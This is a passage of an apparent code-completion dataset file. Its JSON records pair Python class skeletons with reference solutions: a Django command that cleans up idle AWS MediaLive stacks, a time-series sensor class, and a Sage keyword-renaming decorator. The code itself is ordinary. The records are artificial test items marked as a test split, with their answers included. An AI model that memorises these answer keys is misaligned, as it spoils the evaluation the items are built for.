to ENDED, the upload_state to DELETED and delete all AWS resources", "prompted_full_text": "Implement the Python class `Command` described below.\n\nClass description:\nOnce a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. 
If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\n\nMethod signatures and docstrings:\n- def handle(self, *args, **options): Execute management command.\n- def _delete_live(self, live, medialive_channel): Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\n\n<|skeleton|>\nclass Command:\n \"\"\"Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\"\"\"\n\n def handle(self, *args, **options):\n \"\"\"Execute management command.\"\"\"\n <|body_0|>\n\n def _delete_live(self, live, medialive_channel):\n \"\"\"Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n expired_date = generate_expired_date()\n for medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)\n<|end_body_0|>\n\n<|body_start_1|>\n self.stdout.write(f'deleting AWS resources for video {live.id}')\n delete_medialive_stack(medialive_channel, self.stdout)\n self.stdout.write(f'Set video state to deleted for video {live.id}')\n live.live_state = ENDED\n live.upload_state = DELETED\n live.live_info.pop('medialive')\n live.live_info.pop('mediapackage')\n live.save(update_fields=('live_state', 'upload_state', 'live_info'))\n<|end_body_1|>\n", "revision_id": "f767f1bdc12c9712f26ea17cb8b19f536389f0ed", "skeleton": "<|skeleton|>\nclass Command:\n \"\"\"Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. 
These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\"\"\"\n\n def handle(self, *args, **options):\n \"\"\"Execute management command.\"\"\"\n <|body_0|>\n\n def _delete_live(self, live, medialive_channel):\n \"\"\"Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Command:\n \"\"\"Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\"\"\"\n\n def handle(self, *args, **options):\n \"\"\"Execute management command.\"\"\"\n expired_date = generate_expired_date()\n for medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)\n\n def _delete_live(self, live, medialive_channel):\n \"\"\"Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\"\"\"\n self.stdout.write(f'deleting AWS resources for video {live.id}')\n delete_medialive_stack(medialive_channel, self.stdout)\n self.stdout.write(f'Set video state to deleted for video {live.id}')\n live.live_state = ENDED\n live.upload_state = DELETED\n live.live_info.pop('medialive')\n live.live_info.pop('mediapackage')\n live.save(update_fields=('live_state', 'upload_state', 'live_info'))\n", "source": "the_stack_v2_python_sparse", "source_path": "src/backend/marsha/core/management/commands/clean_aws_elemental_stack.py", "source_repo": "openfun/marsha", "split": "test", "star_events_count": 92} {"blob_id": "61a4ee57be4727ef84cd7310f388a3debd1b5566", "bodies": ["from .timeseriesdata import TimeSeriesData\ntry:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\nexcept TimeSeriesData.DoesNotExist:\n return {}\nreturn data", "from .timeseriesdata import TimeSeriesData\nraw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\nif not raw:\n raise TimeSeriesData.DoesNotExist\nexpected_samples = (data_end - data_start).total_seconds() / self.resolution\nif resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\nelse:\n aggregation_factor = int(resolution // 
self.resolution)\nlogger.debug('%s objects to aggregate', len(raw))\naggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\nlogger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\ndata = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\nreturn data", "if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\nfrom .timeseriesdata import TimeSeriesData\nif resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\nelse:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\nreturn data", "from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\nif not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\nelif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\ndata = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\nlogger.debug('to archive: %s', data)\narchived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\narchived.save()\nlogger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\nif delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\nreturn archived"], "bodies_text": "<|body_start_0|>\n from .timeseriesdata import TimeSeriesData\n try:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\n except TimeSeriesData.DoesNotExist:\n return {}\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n from .timeseriesdata import TimeSeriesData\n raw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\n if not raw:\n raise TimeSeriesData.DoesNotExist\n expected_samples = (data_end - data_start).total_seconds() / self.resolution\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n aggregation_factor = int(resolution // self.resolution)\n logger.debug('%s objects to aggregate', len(raw))\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n logger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\n data = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\n from .timeseriesdata import TimeSeriesData\n if resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\n else:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n if not aggregation_type:\n aggregation_type = 
self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n data = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\n logger.debug('to archive: %s', data)\n archived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\n archived.save()\n logger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n if delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\n return archived\n<|end_body_3|>\n", "class_docstring": "A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor", "class_name": "DeviceSensor", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DeviceSensor:\n \"\"\"A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\"\"\"\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\"\"\"\n <|body_0|>\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\"\"\"\n <|body_1|>\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\"\"\"\n <|body_2|>\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. 
Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from .timeseriesdata import TimeSeriesData\n try:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\n except TimeSeriesData.DoesNotExist:\n return {}\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n from .timeseriesdata import TimeSeriesData\n raw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\n if not raw:\n raise TimeSeriesData.DoesNotExist\n expected_samples = (data_end - data_start).total_seconds() / self.resolution\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n aggregation_factor = int(resolution // self.resolution)\n logger.debug('%s objects to aggregate', len(raw))\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n logger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\n data = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\n from .timeseriesdata import TimeSeriesData\n if resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\n else:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n data = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\n logger.debug('to archive: %s', data)\n archived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\n archived.save()\n logger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n if delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\n return archived\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000416", "length_bytes": 8729, "license_type": "permissive", "methods": [{"docstring": "Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this", "name": "get_latest_ts_data", "signature": "def get_latest_ts_data(self)"}, {"docstring": "Implementation of aggregating data. See other functions for meanings of arguments. 
Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period", "name": "_get_aggregated_data", "signature": "def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type)"}, {"docstring": "Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.", "name": "optimised_data_fetch", "signature": "def optimised_data_fetch(self, data_start, data_end, resolution)"}, {"docstring": "Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu", "name": "archive_between", "signature": "def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_004059", "prompt": "Implement the Python class `DeviceSensor` described below.\n\nClass description:\nA sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\n\nMethod signatures and docstrings:\n- def get_latest_ts_data(self): Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\n- def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type): Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\n- def optimised_data_fetch(self, data_start, data_end, resolution): Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\n- def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False): Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. 
Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu", "prompted_full_text": "Implement the Python class `DeviceSensor` described below.\n\nClass description:\nA sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\n\nMethod signatures and docstrings:\n- def get_latest_ts_data(self): Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\n- def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type): Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\n- def optimised_data_fetch(self, data_start, data_end, resolution): Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\n- def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False): Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\n\n<|skeleton|>\nclass DeviceSensor:\n \"\"\"A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\"\"\"\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\"\"\"\n <|body_0|>\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\"\"\"\n <|body_1|>\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\"\"\"\n <|body_2|>\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. 
Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from .timeseriesdata import TimeSeriesData\n try:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\n except TimeSeriesData.DoesNotExist:\n return {}\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n from .timeseriesdata import TimeSeriesData\n raw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\n if not raw:\n raise TimeSeriesData.DoesNotExist\n expected_samples = (data_end - data_start).total_seconds() / self.resolution\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n aggregation_factor = int(resolution // self.resolution)\n logger.debug('%s objects to aggregate', len(raw))\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n logger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\n data = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\n from .timeseriesdata import TimeSeriesData\n if resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\n else:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n data = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\n logger.debug('to archive: %s', data)\n archived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\n archived.save()\n logger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n if delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\n return archived\n<|end_body_3|>\n", "revision_id": "5c569f54f100e23d72e2ac4de795739ea461a431", "skeleton": "<|skeleton|>\nclass DeviceSensor:\n \"\"\"A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\"\"\"\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\"\"\"\n <|body_0|>\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings of arguments. 
Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\"\"\"\n <|body_1|>\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\"\"\"\n <|body_2|>\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DeviceSensor:\n \"\"\"A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\"\"\"\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\"\"\"\n from .timeseriesdata import TimeSeriesData\n try:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\n except TimeSeriesData.DoesNotExist:\n return {}\n return data\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings of arguments. 
Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\"\"\"\n from .timeseriesdata import TimeSeriesData\n raw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\n if not raw:\n raise TimeSeriesData.DoesNotExist\n expected_samples = (data_end - data_start).total_seconds() / self.resolution\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n aggregation_factor = int(resolution // self.resolution)\n logger.debug('%s objects to aggregate', len(raw))\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n logger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\n data = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\n return data\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\"\"\"\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\n from .timeseriesdata import TimeSeriesData\n if resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\n else:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\n return data\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. 
Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\"\"\"\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n data = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\n logger.debug('to archive: %s', data)\n archived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\n archived.save()\n logger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n if delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\n return archived\n", "source": "the_stack_v2_python_sparse", "source_path": "zconnect/zc_timeseries/_models/sensor.py", "source_repo": "zconnect-iot/zconnect-django", "split": "test", "star_events_count": 2} {"blob_id": "4ead87beb7ecec27cfd6c6c437cdef82d156e013", "bodies": ["assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\nself.renames = renames\nself.deprecation = deprecation", "@sage_wraps(func)\ndef wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\nreturn wrapper"], "bodies_text": "<|body_start_0|>\n assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\n self.renames = renames\n self.deprecation = deprecation\n<|end_body_0|>\n\n<|body_start_1|>\n @sage_wraps(func)\n def wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\n return wrapper\n<|end_body_1|>\n", "class_docstring": "", "class_name": "rename_keyword", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass rename_keyword:\n\n def __init__(self, deprecated=None, deprecation=None, **renames):\n \"\"\"A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\"\"\"\n <|body_0|>\n\n def __call__(self, func):\n \"\"\"Rename keywords. 
EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\n self.renames = renames\n self.deprecation = deprecation\n<|end_body_0|>\n\n<|body_start_1|>\n @sage_wraps(func)\n def wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\n return wrapper\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000417", "length_bytes": 27285, "license_type": "no_license", "methods": [{"docstring": "A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will 